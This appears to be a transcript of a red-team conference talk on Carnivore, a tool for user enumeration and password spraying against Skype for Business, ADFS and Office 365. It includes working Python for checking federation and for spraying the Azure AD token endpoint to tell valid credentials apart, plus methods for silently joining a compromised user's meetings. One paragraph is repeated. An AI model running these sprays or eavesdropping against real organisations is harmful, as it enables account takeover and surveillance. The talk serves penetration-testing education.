investigation update — you can see why that would be concerning for an organisation, because without any exploit, any further phishing, or any payload being executed, you've gone from being out on the internet to being able to listen in on, and even record, sensitive meetings while essentially impersonating that user. On the right you can see "lobby bypass enabled", which means that when you dial in you skip the lobby — there's no waiting room someone has to let you in from. And the join URL: if you go to that you can join the meeting and basically enter a name of your choice.
One thing you could do, having already pulled the address book, is pick a name with a social-engineering angle — though that's potentially more likely to get you caught, whereas just dialling in and there being two of the compromised user is maybe less troubling to people. Another thing to say is that the API basically only seems to give the meeting expiry, which is two weeks after the meeting ends; Carnivore takes the two weeks off for you automatically, and then you need a bit of common sense on top. For example, the top meeting there: we can tell it ends at 11:30 — I set the subject of that one to the time while I was troubleshooting, so you can see it actually starts at 11:00, but normally you wouldn't get that information, because that's just the subject. Applying some common sense, if a meeting ends at 11:30 it probably starts at 11:00 or even 10:30. A couple of extra points to mention: it only seems to be able to pull back self-scheduled meetings — which doesn't fully make sense to me, because in Outlook you don't just see the meetings you've scheduled, you see every meeting you're part of, but unfortunately we can't get that through this tool — and, as I said, meeting end time only. There are some weird edge cases with that: I set a recurring meeting, and the only information we get back is that it ends on the 26th of December 2022, which obviously isn't that useful; maybe you could figure out that it's a Friday at half ten and guess it's every Friday, but again we can't get that back through the API. Okay, so, Office 365. I'm not going to demo this — what I've shown so far is basically just my lab — but I'll talk you through how Carnivore works. Username enumeration that doesn't require a password guess has been quite widely covered, with things like o365enum and similar tools, so I'm just going to get into password spraying and give some key pointers. As I said before, federated is a win: the usual Active Directory rules will apply to lockouts, rather than Office 365's extremely robust rules. There's a link, which I'm about to show, where you can find out whether an organisation is federated or not; if it is, you'll get back the ADFS server location, and Carnivore adds it automatically. If it's not federated we can still spray — we have to spray the Office portal — and we can still determine whether a user and password are valid, even with MFA in the way; and if it is federated, you have to spray ADFS, because spraying the Office portal won't give you back anything useful. On the password-spray countermeasures for Office 365: they have things like separate bad-password counts for trusted versus untrusted networks, so if you're spraying from the untrusted side — which presumably you are — your guesses are adding to a count shared with everyone else in the world. Lockout is therefore fairly frequent and quick, but from Microsoft's side that's by design, so the genuine user can still sign in while on their corporate VPN or similar — good security measures, but difficult from a red-team perspective. So, first of all, to find out whether the organisation is federated: here's an example request. The username itself is irrelevant — it's just the domain.com part we're looking at. In the response, this would say "Federated" instead of "Managed" if they were federated, and it can also include some boilerplate text — for example, whether "keep me signed in" is disabled, which might be interesting from a red-team perspective because it hints they've had the configuration looked at, since users can't just stay signed in forever. You also get the federation brand name there, and you can get back logo information and that kind of thing; and if this said federated, we would also see the location of the ADFS authentication endpoint.
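That federation check is a single unauthenticated GET against the getuserrealm endpoint; a hedged sketch follows. The field names shown are the ones commonly reported for this response rather than values quoted in the talk, so verify them against the live output.

```python
import requests

# The account in the login parameter does not need to exist - only the domain matters
DOMAIN = "example.com"

r = requests.get("https://login.microsoftonline.com/getuserrealm.srf",
                 params={"login": f"anything@{DOMAIN}"}, timeout=10)
realm = r.json()

print("NameSpaceType :", realm.get("NameSpaceType"))        # "Managed" or "Federated"
print("Brand name    :", realm.get("FederationBrandName"))
print("ADFS endpoint :", realm.get("AuthURL"))              # only present when federated
```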
So lockout from the untrusted side is fairly frequent and quick. From Microsoft's side, obviously, that's designed so that the genuine user can still sign in while on their corporate VPN or something like that: good security measures, but difficult from a red team perspective. So, first of all, to find out if the organization is federated, this is an example request here. The username itself is irrelevant; it's just the domain.com part that we're looking for. And in the response here, if they were federated, that would say "Federated" instead of "Managed". It can also include some boilerplate-style settings, for example whether "keep me signed in" is disabled. That one might be interesting from a red team perspective, because it maybe hints that they have fairly good security and have had the configuration looked at, since users can't just stay signed in forever. You also get the federation brand name, and you can get back logo information and that kind of thing. And if this said federated, we would also see the location of the ADFS authentication endpoint there. So for password spraying, this is how Carnivore does it. This is the endpoint we're hitting, with the username and the password. The client ID and the scope could obviously be tweaked to be a bit more realistic or representative, but this is what Carnivore uses. This first response is what you get for an invalid password. The actual message says "invalid username or password", which seems like it might be tricky for us: is it the username or the password that's wrong? But if the username is incorrect, we get a different message back, that the user account does not exist in that directory. From that we can tell the previous response means the password is wrong, not the username. And just to mention, where it says "email hidden", I've not added that; that's the actual response. Then this is a valid username and password without MFA. Again, this is specific to the request Carnivore makes: because we gave a client ID that doesn't exist, if the username and password are correct you get an "unauthorized client" error and a message that the application doesn't exist, because it's not a proper client ID. And if it's a valid username and password with MFA, we again get an "invalid grant", but now it tells us it's due to configuration, meaning you need to supply multi-factor authentication. So the username and password are correct, but you need MFA. (A rough sketch of how these responses can be told apart programmatically follows after the outro.) So, outro, very briefly. I almost forgot to put it in, but here's a link to the tool itself, so you can go there to download the latest version, and for any issues or anything you want to bring up there, I'll be happy to try and help wherever I can. So thank you for listening. Hopefully it's been useful, and enjoy carnivoring.
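As the reference promised above, here is a minimal sketch of one spray attempt against the token endpoint and a rough interpretation of the response. This is not Carnivore's code: the endpoint, the deliberately bogus client_id and the AADSTS error codes used to tell the cases apart are assumptions based on behaviour commonly observed against Azure AD, and Carnivore itself may key off the message text instead.

```python
import requests

TOKEN_URL = "https://login.microsoftonline.com/organizations/oauth2/v2.0/token"

def try_password(username: str, password: str) -> str:
    """Make a single resource-owner password credential request and classify
    the result. The bogus client_id is deliberate: if the credentials are
    valid, Azure AD complains about the unknown application rather than the
    password, which is how "valid without MFA" can be detected."""
    data = {
        "grant_type": "password",
        "username": username,
        "password": password,
        "client_id": "00000000-0000-0000-0000-000000000000",  # intentionally not a real app
        "scope": "openid",
    }
    desc = requests.post(TOKEN_URL, data=data).json().get("error_description", "")
    if "AADSTS50034" in desc:
        return "user does not exist in the directory"
    if "AADSTS50126" in desc:
        return "valid user, wrong password"
    if "AADSTS50076" in desc or "AADSTS50079" in desc:
        return "VALID credentials, MFA required"
    if "AADSTS700016" in desc:
        return "VALID credentials, no MFA (the unknown client_id is rejected after auth)"
    return f"unrecognised response: {desc[:80]}"

# Example usage with hypothetical values:
print(try_password("alice@example.com", "Winter2020!"))
```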
|
Carnivore is a username enumeration and password spraying tool for Microsoft services (Skype for Business, ADFS, RDWeb, Exchange and Office 365). It originally began as an on-premises Skype for Business enumeration/spray tool, as I was finding that these days organisations often seem to have locked down their implementations of Exchange, whereas Skype for Business has been left externally accessible and has not received as much attention from previous penetration tests, due to the lack of tools as impactful as Mailsniper. Over time this was improved and built upon to bring the same service discovery, username enumeration and password spraying capability to Skype, ADFS, RDWeb, Exchange, and O365, all in the same tool. Carnivore includes new post-compromise functionality for Skype for Business (pulling the internal address list and user presence through the API), and smart detection of the username format for all services. It also remains a practical means of entry into an organisation: numerous external penetration tests have uncovered an on-premises Skype for Business or ADFS server even for organisations that have moved Mail/SSO/etc to the cloud.
|